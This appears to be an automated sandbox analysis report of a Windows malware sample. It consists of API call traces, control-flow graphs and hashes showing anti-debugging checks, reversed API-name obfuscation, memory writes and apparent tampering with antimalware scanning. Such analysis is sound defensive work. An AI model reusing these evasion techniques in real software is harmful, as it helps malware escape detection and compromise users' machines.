                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02885CB5
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02885CDB
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02885CEB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                            • API String ID: 1759228003-2375825460
                                                                            • Opcode ID: fd500b2efa21bca25f147a5ecf241adbbc28935aad7603bad11f1948da1b5251
                                                                            • Instruction ID: 4b6ea39a591f4263f484ef40b618c0d94c43b0bf27b8ee99f386d7313f08bdd1
                                                                            • Opcode Fuzzy Hash: fd500b2efa21bca25f147a5ecf241adbbc28935aad7603bad11f1948da1b5251
                                                                            • Instruction Fuzzy Hash: 5851BC7DA4025D7EFB21E6E4CC45FEF77AD9F04744F4101A1AB08E6181DBB89A448F62

                                                                            Control-flow Graph

                                                                            control_flow_graph 12432 289894c-2898971 LoadLibraryW 12433 28989bb-28989c1 12432->12433 12434 2898973-289898b GetProcAddress 12432->12434 12435 289898d-28989ac call 2897d78 12434->12435 12436 28989b0-28989b6 FreeLibrary 12434->12436 12435->12436 12439 28989ae 12435->12439 12436->12433 12439->12436
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize,029073A8,0289A93C,UacScan), ref: 02898960
                                                                            • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0289897A
                                                                            • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize), ref: 028989B6
                                                                              • Part of subcall function 02897D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02897DEC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                            • String ID: BCryptVerifySignature$bcrypt
                                                                            • API String ID: 1002360270-4067648912
                                                                            • Opcode ID: 11298bd77398292ad64fe3df46036eea709aa6e412a8d0f63fe2f5d01ed3a152
                                                                            • Instruction ID: 66405df0dfecaad648b8d981aec2139967865e5aec720b60295840b97b543af4
                                                                            • Opcode Fuzzy Hash: 11298bd77398292ad64fe3df46036eea709aa6e412a8d0f63fe2f5d01ed3a152
                                                                            • Instruction Fuzzy Hash: F7F08CB9AC825C9EF710A6E9B8C9BF6B7DC9782635F040929A908C6284D67138518B61

                                                                            Control-flow Graph

                                                                            control_flow_graph 12449 289f744-289f75e GetModuleHandleW 12450 289f78a-289f792 12449->12450 12451 289f760-289f772 GetProcAddress 12449->12451 12451->12450 12452 289f774-289f784 CheckRemoteDebuggerPresent 12451->12452 12452->12450 12453 289f786 12452->12453 12453->12450
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KernelBase), ref: 0289F754
                                                                            • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0289F766
                                                                            • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0289F77D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                            • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                            • API String ID: 35162468-539270669
                                                                            • Opcode ID: 967decebe5242fae912f15662ccb989d0f2c05d72b839bdf24eca38643012625
                                                                            • Instruction ID: 7195db2b506cb3a982eda4ae9ec39444efc3d9886f00f4c043e36aa652b16986
                                                                            • Opcode Fuzzy Hash: 967decebe5242fae912f15662ccb989d0f2c05d72b839bdf24eca38643012625
                                                                            • Instruction Fuzzy Hash: 8FF0A77C9042D8BAEF14A6B888C87DCFBA95B15338F2843909535E25C1F7760680CA51

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 02884F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02884F2E
                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0289DE40), ref: 0289DDAB
                                                                            • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0289DE40), ref: 0289DDDB
                                                                            • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0289DDF0
                                                                            • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0289DE1C
                                                                            • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0289DE25
                                                                              • Part of subcall function 02884C60: SysFreeString.OLEAUT32(0289F4A4), ref: 02884C6E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                            • String ID:
                                                                            • API String ID: 1897104825-0
                                                                            • Opcode ID: 0e430d13c69db6fd089333aded0d9b9826c599f8b4062dd9646899ac5eed2529
                                                                            • Instruction ID: b8e377d07c7ad5d25ccc48dc617b0f7449c2a5538efba1d1d1ede3f20c5d78c7
                                                                            • Opcode Fuzzy Hash: 0e430d13c69db6fd089333aded0d9b9826c599f8b4062dd9646899ac5eed2529
                                                                            • Instruction Fuzzy Hash: FF21C07AA40209BAEB51FAE8CC52FDE77ADEB48700F540465B600E7581EA74AA048B55

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0289E5F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: CheckConnectionInternet
                                                                            • String ID: Initialize$OpenSession$ScanBuffer
                                                                            • API String ID: 3847983778-3852638603
                                                                            • Opcode ID: e5f07e1c2b854a9a2f78113a9c2121cb0752ab46ec6a20a14d2917b5c0733241
                                                                            • Instruction ID: a1bd2376ed25e5774bed3e0f11b46415f66d031d50f134728fe99dfa02c266f4
                                                                            • Opcode Fuzzy Hash: e5f07e1c2b854a9a2f78113a9c2121cb0752ab46ec6a20a14d2917b5c0733241
                                                                            • Instruction Fuzzy Hash: AE41113EB0010DABEF11FBA8D841ADE77BAEF88700F144466E041E7652EA75AD05CF56

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 02884F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02884F2E
                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0289DD5E), ref: 0289DCCB
                                                                            • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0289DD05
                                                                            • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0289DD32
                                                                            • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0289DD3B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                            • String ID:
                                                                            • API String ID: 3764614163-0
                                                                            • Opcode ID: b66d2a41a8808f4ba89f252672a8ea29623e5d7f9e9773cb5318d08b62f58a57
                                                                            • Instruction ID: 3e01861fee758637de8df63c9af711fa50ee597857f3ca144786a01ae4081e45
                                                                            • Opcode Fuzzy Hash: b66d2a41a8808f4ba89f252672a8ea29623e5d7f9e9773cb5318d08b62f58a57
                                                                            • Instruction Fuzzy Hash: 9C21E07AA40209BAEB20EBA8DD42FDEB7BDEB05B00F554461B600F75D0D7B47A048B65
                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02897A9F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                            • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                            • API String ID: 4072585319-445027087
                                                                            • Opcode ID: 939437f37a4c341439f33f6f43cb435656f9e8da9a81dcceabfb75f63083abf8
                                                                            • Instruction ID: 071495c140d6516607bdb626f4b755f3e61f06fb70da66c876ed6f486a7196f8
                                                                            • Opcode Fuzzy Hash: 939437f37a4c341439f33f6f43cb435656f9e8da9a81dcceabfb75f63083abf8
                                                                            • Instruction Fuzzy Hash: 4B112D7D654209BFEF04EFA8EC81FAEB7EEEB49710F544460B900D7640E674BA108B65
                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02897A9F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                             • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                            • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                            • API String ID: 4072585319-445027087
                                                                            • Opcode ID: 5138e5596df1fb293e01e591a31024de0c77f2614698e3f433f328bc3adecdc6
                                                                            • Instruction ID: 3f30e74c28a1bb4188170e041354a8a9ac0481035fa403ab4d6e1643fdb46d55
                                                                            • Opcode Fuzzy Hash: 5138e5596df1fb293e01e591a31024de0c77f2614698e3f433f328bc3adecdc6
                                                                            • Instruction Fuzzy Hash: 80112D7D654209BFEF04EFA8EC81FAEB7EEEB49710F544460B900D7640D674BA108B65
                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02897DEC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                             • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                            • String ID: Ntdll$yromeMlautriVetirW
                                                                            • API String ID: 2719805696-3542721025
                                                                            • Opcode ID: 3243da5a45c486ce9af9b0964825b3117436b4a01ea39120064faf223b4e3d47
                                                                            • Instruction ID: 01051ce042db71c0caa203074ab294e09f8d0923c3942836797940cb28fd2f97
                                                                            • Opcode Fuzzy Hash: 3243da5a45c486ce9af9b0964825b3117436b4a01ea39120064faf223b4e3d47
                                                                            • Instruction Fuzzy Hash: C50129BD65420AAFEF00EF98EC81E9EB7EDEB49B10F504850B900D7640D674BD108B65
                                                                            APIs
                                                                            • RtlI.N(?,?,00000000,0289DC7E), ref: 0289DC2C
                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0289DC7E), ref: 0289DC42
                                                                            • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0289DC7E), ref: 0289DC61
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                             • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Path$DeleteFileNameName_
                                                                            • String ID:
                                                                            • API String ID: 4284456518-0
                                                                            • Opcode ID: e1297fbf0674e24f27cba8962d58d34cd041a7d97f3093264ae7a1154d6af2a8
                                                                            • Instruction ID: 11a53bc1c80c107cc704faa33edc42cec0701df36791c8009566191f95d8527e
                                                                            • Opcode Fuzzy Hash: e1297fbf0674e24f27cba8962d58d34cd041a7d97f3093264ae7a1154d6af2a8
                                                                            • Instruction Fuzzy Hash: 6D014F7D944209AEEF05FBA4CD41FCD77B9AB44708F5544929200E7181EAB5AB04CB2A
                                                                            APIs
                                                                              • Part of subcall function 02884F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02884F2E
                                                                            • RtlI.N(?,?,00000000,0289DC7E), ref: 0289DC2C
                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0289DC7E), ref: 0289DC42
                                                                            • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0289DC7E), ref: 0289DC61
                                                                              • Part of subcall function 02884C60: SysFreeString.OLEAUT32(0289F4A4), ref: 02884C6E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                             • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                            • String ID:
                                                                            • API String ID: 1530111750-0
                                                                            • Opcode ID: d719b35fbec2a191f3940d21165c900d084af3c11bb66cfc471fe3d57c2436b6
                                                                            • Instruction ID: 999b557ea50d027eeb4671a69a8098266fa9836d8f704091d1154994b6655470
                                                                            • Opcode Fuzzy Hash: d719b35fbec2a191f3940d21165c900d084af3c11bb66cfc471fe3d57c2436b6
                                                                            • Instruction Fuzzy Hash: 5901F47E94020DBEEB11FBA4DD42FCDB3BDEB48700F5144A1E601E7580EB746B048A69
                                                                            APIs
                                                                              • Part of subcall function 02896D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02896DB9,?,?,?,00000000), ref: 02896D99
                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,02896EAC,00000000,00000000,02896E2B,?,00000000,02896E9B), ref: 02896E17
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                             • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFromInstanceProg
                                                                            • String ID:
                                                                            • API String ID: 2151042543-0
                                                                            • Opcode ID: 1b6339a673e40ec82914aa24045a8726ead5e16156fa5f4393e66bbf56268f71
                                                                            • Instruction ID: a039731802cb8caff4383d961dcdab55f2f7962580b2e2528157dfa73db42d2b
                                                                            • Opcode Fuzzy Hash: 1b6339a673e40ec82914aa24045a8726ead5e16156fa5f4393e66bbf56268f71
                                                                            • Instruction Fuzzy Hash: 7301F23D208704AEFB15EFA9DC2296FBBBDE749B00B620875F405E2780F635A900C861
                                                                            APIs
                                                                              • Part of subcall function 0289AB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0289ADA3,?,?,0289AE35,00000000,0289AF11), ref: 0289AB30
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0289AB48
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0289AB5A
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0289AB6C
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0289AB7E
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0289AB90
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0289ABA2
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 0289ABB4
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0289ABC6
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0289ABD8
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0289ABEA
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0289ABFC
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0289AC0E
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 0289AC20
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0289AC32
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0289AC44
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0289AC56
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,0289AE35,00000000,0289AF11), ref: 0289ADA9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                             • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 2242398760-0
                                                                            • Opcode ID: 67e5e0e33a9fda17caf042bb94643fb17cfd4c3d9a393c96a9f14a00845176ba
                                                                            • Instruction ID: a7ba233ade50034da873685eb9f59d264c5ce755b0a8f73d28648095fe236d7b
                                                                            • Opcode Fuzzy Hash: 67e5e0e33a9fda17caf042bb94643fb17cfd4c3d9a393c96a9f14a00845176ba
                                                                            • Instruction Fuzzy Hash: 5AC08CBB7022201B8E2466FC3CC89D7878DCD8A1B730808A2F908E3102D7259C1092E0
                                                                            APIs
                                                                            • InetIsOffline.URL(00000000,00000000,028AB784,?,?,?,00000000,00000000), ref: 0289F801
                                                                              • Part of subcall function 028989D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0290738C,Function_0000662C,00000004,0290739C,0290738C,05F5E103,00000040,029073A0,74AE0000,00000000,00000000), ref: 02898AAA
                                                                              • Part of subcall function 0289F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,0289FAEB,UacInitialize,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,ScanString,02907380,028AB7B8,Initialize), ref: 0289F6EE
                                                                              • Part of subcall function 0289F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0289F700
                                                                              • Part of subcall function 0289F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 0289F754
                                                                              • Part of subcall function 0289F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0289F766
